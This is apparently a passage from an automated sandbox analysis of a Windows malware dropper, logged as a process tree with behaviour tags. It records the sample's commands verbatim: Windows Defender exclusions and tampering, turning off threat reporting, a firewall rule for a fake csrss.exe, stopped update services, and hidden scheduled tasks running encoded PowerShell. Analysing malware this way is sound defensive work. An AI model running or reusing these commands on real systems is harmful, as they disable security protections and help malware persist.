        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:4152
        
        C:\Windows\SysWOW64\cmd.exe
        
        cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        8⤵
        
        PID:4368
        
        C:\Windows\SysWOW64\sc.exe
        
        sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
        9⤵
        Checks BIOS information in registry
        Loads dropped DLL
        Drops file in System32 directory
        Launches sc.exe
        Enumerates system info in registry
        
        PID:1048
        
        C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
        
        C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe
        7⤵
        Executes dropped EXE
        
        PID:2228
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn "csrss" /f
        8⤵
        
        PID:2936
        
        C:\Windows\SYSTEM32\schtasks.exe
        
        schtasks /delete /tn "ScheduledUpdate" /f
        8⤵
        
        PID:1288
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        9⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:2240
  - - C:\Users\Admin\Pictures\Qw369efixtIBKFp9ZFZ0w0mq.exe
      "C:\Users\Admin\Pictures\Qw369efixtIBKFp9ZFZ0w0mq.exe"
      4⤵
      Suspicious use of NtCreateUserProcessOtherParentProcess
      Drops file in Drivers directory
      Executes dropped EXE
      Drops file in Program Files directory
      Suspicious behavior: EnumeratesProcesses
      PID:4544
  - - C:\Users\Admin\Pictures\FcrfIQnc3MnN2EYixmyTFb6D.exe
      "C:\Users\Admin\Pictures\FcrfIQnc3MnN2EYixmyTFb6D.exe"
      4⤵
      Executes dropped EXE
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:1124
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        5⤵
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3252
    - - C:\Users\Admin\Pictures\FcrfIQnc3MnN2EYixmyTFb6D.exe
        
        "C:\Users\Admin\Pictures\FcrfIQnc3MnN2EYixmyTFb6D.exe"
        5⤵
        
        PID:4328
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4928
      - C:\Windows\System32\cmd.exe
        
        C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
        6⤵
        
        PID:2260
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        7⤵
        
        PID:4236
        
        C:\Windows\system32\netsh.exe
        
        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
        7⤵
        Modifies Windows Firewall
        Modifies data under HKEY_USERS
        
        PID:8
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        
        PID:1028
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -nologo -noprofile
        6⤵
        Drops file in System32 directory
        Modifies data under HKEY_USERS
        
        PID:4136
  - - C:\Users\Admin\Pictures\mAIqaeuuMoGky7kZVzMJ1DQQ.exe
      "C:\Users\Admin\Pictures\mAIqaeuuMoGky7kZVzMJ1DQQ.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of AdjustPrivilegeToken
      PID:1384
  - - C:\Users\Admin\Pictures\zhqw0x5VEifunzipVxSGz3iI.exe
      "C:\Users\Admin\Pictures\zhqw0x5VEifunzipVxSGz3iI.exe" --silent --allusers=0
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Enumerates connected drives
      Modifies system certificate store
      Suspicious use of WriteProcessMemory
      PID:1204
    - - C:\Users\Admin\Pictures\zhqw0x5VEifunzipVxSGz3iI.exe
        
        C:\Users\Admin\Pictures\zhqw0x5VEifunzipVxSGz3iI.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2b4,0x2b8,0x2bc,0x290,0x2c0,0x6f848538,0x6f848548,0x6f848554
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:748
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\zhqw0x5VEifunzipVxSGz3iI.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\zhqw0x5VEifunzipVxSGz3iI.exe" --version
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4908
    - - C:\Users\Admin\Pictures\zhqw0x5VEifunzipVxSGz3iI.exe
        
        "C:\Users\Admin\Pictures\zhqw0x5VEifunzipVxSGz3iI.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=0 --general-interests=0 --general-location=0 --personalized-content=0 --personalized-ads=0 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=1204 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20231022222438" --session-guid=a91e09c5-c8ae-41cb-bbb5-f2b42ac0f326 --server-tracking-blob=MThmMjM3ZDcxY2RmMjgwYTE3M2NkYjNhMGYyZDljYzE3MTVhNjc5ZGIwOWQ0YWUwYWVhZWYxMDIyMDBiOTA1Mzp7ImNvdW50cnkiOiJOTCIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cy8/dXRtX21lZGl1bT1hcGImdXRtX3NvdXJjZT1ta3QmdXRtX2NhbXBhaWduPTc2NyIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTY5ODAxMzQ3NS42Nzk4IiwidXRtIjp7ImNhbXBhaWduIjoiNzY3IiwibWVkaXVtIjoiYXBiIiwic291cmNlIjoibWt0In0sInV1aWQiOiIxNzM0NGZkMi0yYzJhLTRkMzktOGNkNS0xYjUzYTJhMWVhMDAifQ== --silent --desktopshortcut=1 --wait-for-package --initial-proc-handle=6004000000000000
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Enumerates connected drives
        Suspicious use of WriteProcessMemory
        
        PID:4940
      - C:\Users\Admin\Pictures\zhqw0x5VEifunzipVxSGz3iI.exe
        
        C:\Users\Admin\Pictures\zhqw0x5VEifunzipVxSGz3iI.exe --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.34 --initial-client-data=0x2c0,0x2c4,0x2c8,0x290,0x2cc,0x6e668538,0x6e668548,0x6e668554
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:4272
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310222224381\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310222224381\assistant\Assistant_103.0.4928.25_Setup.exe_sfx.exe"
        5⤵
        Executes dropped EXE
        
        PID:4480
    - - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310222224381\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310222224381\assistant\assistant_installer.exe" --version
        5⤵
        Executes dropped EXE
        Loads dropped DLL
        Suspicious use of AdjustPrivilegeToken
        
        PID:4908
      - C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310222224381\assistant\assistant_installer.exe
        
        "C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202310222224381\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector.opera.com/collector/submit --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=103.0.4928.25 --initial-client-data=0x24c,0x250,0x254,0x228,0xac,0xe51588,0xe51598,0xe515a4
        6⤵
        Executes dropped EXE
        Loads dropped DLL
        
        PID:3648
  - - C:\Users\Admin\Pictures\EWJZ39UCGs8aWbGUePjQcrz2.exe
      "C:\Users\Admin\Pictures\EWJZ39UCGs8aWbGUePjQcrz2.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      Checks processor information in registry
      Suspicious behavior: EnumeratesProcesses
      PID:696
    - - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\Pictures\EWJZ39UCGs8aWbGUePjQcrz2.exe" & exit
        5⤵
        
        PID:4308
      - C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 6
        6⤵
        Delays execution with timeout.exe
        
        PID:4124
  - - C:\Users\Admin\Pictures\NjD3wZxeeWlSx5eQJUW3XsQg.exe
      "C:\Users\Admin\Pictures\NjD3wZxeeWlSx5eQJUW3XsQg.exe"
      4⤵
      Executes dropped EXE
      Suspicious use of WriteProcessMemory
      PID:2856
    - - C:\Users\Admin\AppData\Local\Temp\7zSFA7D.tmp\Install.exe
        
        .\Install.exe
        5⤵
        Executes dropped EXE
        Suspicious use of WriteProcessMemory
        
        PID:2816
      - C:\Users\Admin\AppData\Local\Temp\7zSFBE4.tmp\Install.exe
        
        .\Install.exe /dcCcdidRiisJ "385118" /S
        6⤵
        Checks BIOS information in registry
        Executes dropped EXE
        Drops file in System32 directory
        Enumerates system info in registry
        Suspicious use of WriteProcessMemory
        
        PID:4364
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:3576
        
        C:\Windows\SysWOW64\cmd.exe
        
        /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
        8⤵
        
        PID:4568
        
        C:\Windows\SysWOW64\forfiles.exe
        
        "C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
        7⤵
        Suspicious use of WriteProcessMemory
        
        PID:1300
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "gUGewEsHO" /SC once /ST 18:34:32 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
        7⤵
        Creates scheduled task(s)
        
        PID:5012
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /run /I /tn "gUGewEsHO"
        7⤵
        
        PID:3540
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /DELETE /F /TN "gUGewEsHO"
        7⤵
        
        PID:4932
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /CREATE /TN "bwpFiyeZPJPVdaMxTt" /SC once /ST 22:26:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\WEYFRYL.exe\" 3Y /WZsite_idDtn 385118 /S" /V1 /F
        7⤵
        Creates scheduled task(s)
        
        PID:320
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:3268
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:4016
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:2612
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:5060
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:2780
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:2444
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:4236
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:4448
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:196
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3104
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:592
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:4908
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:4844
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\iacrcjwhmdyc.xml"
  2⤵
  - Creates scheduled task(s)
  PID:4624
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"
  2⤵
  PID:1632
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4528
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc
  2⤵
  PID:5048
- - C:\Windows\System32\sc.exe
    sc stop UsoSvc
    3⤵
    - Launches sc.exe
    PID:3972
- - C:\Windows\System32\sc.exe
    sc stop WaaSMedicSvc
    3⤵
    - Launches sc.exe
    PID:4204
- - C:\Windows\System32\sc.exe
    sc stop wuauserv
    3⤵
    - Launches sc.exe
    PID:3644
- - C:\Windows\System32\sc.exe
    sc stop bits
    3⤵
    - Launches sc.exe
    PID:3264
- - C:\Windows\System32\sc.exe
    sc stop dosvc
    3⤵
    - Launches sc.exe
    PID:4220
- C:\Windows\System32\cmd.exe
  C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
  2⤵
  PID:4508
- - C:\Windows\System32\Conhost.exe
    \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    3⤵
    PID:4624
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:2260
- - C:\Windows\System32\powercfg.exe
    powercfg /x -hibernate-timeout-dc 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3528
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-ac 0
    3⤵
    - Suspicious use of AdjustPrivilegeToken
    PID:3332
- - C:\Windows\System32\powercfg.exe
    powercfg /x -standby-timeout-dc 0
    3⤵
    PID:2376
- C:\Windows\System32\schtasks.exe
  C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\iacrcjwhmdyc.xml"
  2⤵
  - Creates scheduled task(s)
  PID:4076
- C:\Windows\System32\conhost.exe
  C:\Windows\System32\conhost.exe
  2⤵
  PID:4564
- C:\Windows\explorer.exe
  C:\Windows\explorer.exe
  2⤵
  PID:2532

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
1⤵
- Suspicious use of WriteProcessMemory
PID:1268
- \??\c:\windows\SysWOW64\reg.exe
  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
  2⤵
  PID:592
- \??\c:\windows\SysWOW64\reg.exe
  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
  2⤵
  PID:4612

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
1⤵
PID:4912

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
1⤵
PID:2716

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3820
- C:\Windows\system32\gpupdate.exe
  "C:\Windows\system32\gpupdate.exe" /force
  2⤵
  PID:2700

C:\Program Files\Google\Chrome\updater.exe
"C:\Program Files\Google\Chrome\updater.exe"
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
PID:4372

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
1⤵
PID:2796

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s fhsvc
1⤵
PID:4452

\??\c:\windows\system32\gpscript.exe
gpscript.exe /RefreshSystemParam
1⤵
- Drops file in Windows directory
PID:320

C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\WEYFRYL.exe
C:\Users\Admin\AppData\Local\Temp\qfiwemQmHAngVYpEP\nfIxQMeJQCLipql\WEYFRYL.exe 3Y /WZsite_idDtn 385118 /S
1⤵
- Executes dropped EXE
- Drops file in System32 directory
PID:4576
- C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
  powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
  2⤵
  - Drops file in System32 directory
  - Modifies data under HKEY_USERS
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:4868
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1748
  - - C:\Windows\SysWOW64\reg.exe
      REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
      4⤵
      PID:412
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4596
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:1408
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:4116
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2208
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:1288
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
    3⤵
    PID:2716
- - C:\Windows\SysWOW64\reg.exe
    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
    3⤵
    PID:3312
- - C:\Windows\SysWOW64\reg.exe
